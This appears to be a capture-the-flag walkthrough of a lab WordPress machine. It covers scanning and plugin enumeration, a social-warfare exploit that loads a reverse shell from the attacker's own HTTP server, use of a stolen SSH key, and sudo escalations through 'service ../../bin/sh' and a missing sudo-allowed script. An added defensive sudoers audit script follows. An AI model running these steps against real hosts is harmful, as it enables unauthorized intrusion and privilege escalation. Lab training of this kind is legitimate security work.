We start by scanning the host with “nmap -A -T4 -p- 192.168.1.11 -vv”:

Port 80 is open, so we scan it with “dirb http://192.168.1.18 /usr/share/dirb/wordlist/big.txt”:

The box is running a WordPress service, so we can enumerate the plugins and see what we get:
wpscan --url http://192.168.1.18/wordpress -e ap

We got two plugins, (simple-cart-solution) and (social-warfare). Searching online for exploits, I found this webpage for the “social-soluion” vulnerability HERE and HERE:
Now we need to start a simple server on our machine to upload the shell to the target:
python -m SimpleHTTPServer 8080
What I did here was start the simple server, copy the exploit, and put my IP address at the end of the command along with the shell file I wanted to run, “rshell.php”. Then we head to http://192.168.1.18/wordpress/wp-admin/rshell.php
and start a listening port, and you will get a shell back:


The first file I opened is personal.txt; it’s base64-encoded, and when we decode it:

We have a .ssh folder where we can find the id_rsa file:

Copy it, save it, and we can SSH in with it:
chmod 600 keys.txt
ssh max@192.168.1.11 -i keys.txt


Max flag file
Now max can run “sudo -l”:

sudo -u steven service ../../bin/sh

Steven flag file
Also, Steven can run “sudo -l”:

But first, the path /opt/tools/server-health.sh doesn’t exist, so just create it, and inside the file server-health.sh put:

Run it with sudo -u root /opt/tools/server-health.sh
And you are root.
Root flag file
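Both escalations on this box come from the same class of sudoers mistake: max is allowed to run a wrapper (service) that takes a caller-supplied path, and steven is allowed to run a script whose path does not exist yet, so whoever creates it runs as root. The following POSIX sh audit is an added example, not part of the writeup or the box; the sudoers lines, the deploy/rsync rules and the fake directory tree are constructed, and the rule parsing is a deliberately simple heuristic (one command per line, no aliases) rather than a full sudoers grammar. It flags three conditions an administrator would want to see before handing out a rule: MISSING (the target does not exist), WRITABLE-DIR (the parent directory is group- or world-writable, so the file can be swapped) and PATH-ARG (the command is a wrapper that accepts relative paths).

```shell
#!/bin/sh
# Added example: audit sudoers rules for the weaknesses used on this box.
# Constructed sudoers content modelled on the rules max and steven hold,
# plus one clean rule (rsync) and one with a writable parent (deploy).
SAMPLE_SUDOERS='max ALL=(steven) NOPASSWD: /usr/sbin/service
steven ALL=(root) NOPASSWD: /opt/tools/server-health.sh
backup ALL=(root) NOPASSWD: /usr/bin/rsync
deploy ALL=(root) NOPASSWD: /srv/deploy/restart.sh'

# Wrappers that take a caller-supplied path; granting them via sudo hands
# the target user any command the path points at (assumed list).
PATH_TAKING_CMDS='service env'

# audit_sudoers TEXT ROOT
# ROOT is prepended to every command path so the check can run against a
# constructed tree instead of the live filesystem. Prints one finding per
# rule: "PATH-ARG user cmd", "MISSING user cmd" or "WRITABLE-DIR user cmd".
audit_sudoers() {
  text="$1"; root="${2:-}"
  printf '%s\n' "$text" | while IFS= read -r line; do
    case "$line" in ''|\#*|Defaults*) continue ;; esac
    user=${line%% *}
    # command spec is the text after "NOPASSWD: "/"PASSWD: ", else the last word
    case "$line" in
      *': '*) cmd=${line##*: } ;;
      *)      cmd=${line##* } ;;
    esac
    cmd=${cmd%% *}                      # binary path only, drop arguments
    base=${cmd##*/}
    dir=${cmd%/*}
    for w in $PATH_TAKING_CMDS; do
      [ "$base" = "$w" ] && printf 'PATH-ARG %s %s\n' "$user" "$cmd"
    done
    if [ ! -e "$root$cmd" ]; then
      printf 'MISSING %s %s\n' "$user" "$cmd"
    elif [ -d "$root$dir" ]; then
      # positions 6 and 9 of the ls mode string are the group/other write bits
      mode=$(ls -ld "$root$dir" | cut -c1-10)
      case "$mode" in
        ?????w????|????????w?) printf 'WRITABLE-DIR %s %s\n' "$user" "$cmd" ;;
      esac
    fi
  done
}

# Build a throwaway tree that mirrors the sample rules: service and rsync
# exist under 0755 directories, /opt/tools is absent, /srv/deploy is 0777.
make_fake_tree() {
  r=$(mktemp -d)
  mkdir -p "$r/usr/sbin" "$r/usr/bin" "$r/srv/deploy"
  chmod 755 "$r/usr/sbin" "$r/usr/bin"
  chmod 777 "$r/srv/deploy"
  : > "$r/usr/sbin/service"
  : > "$r/usr/bin/rsync"
  : > "$r/srv/deploy/restart.sh"
  printf '%s\n' "$r"
}

FAKE_ROOT=$(make_fake_tree)
audit_sudoers "$SAMPLE_SUDOERS" "$FAKE_ROOT"
# prints:
# PATH-ARG max /usr/sbin/service
# MISSING steven /opt/tools/server-health.sh
# WRITABLE-DIR deploy /srv/deploy/restart.sh
rm -rf "$FAKE_ROOT"
```

Run against a real host with `audit_sudoers "$(cat /etc/sudoers /etc/sudoers.d/*)" ""` (as root, so the files are readable). The fix for both findings on this box is the same: point the rule at a script that already exists, is owned by root and sits in a root-owned, non-writable directory, and never grant a generic launcher such as service when a single absolute command would do.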
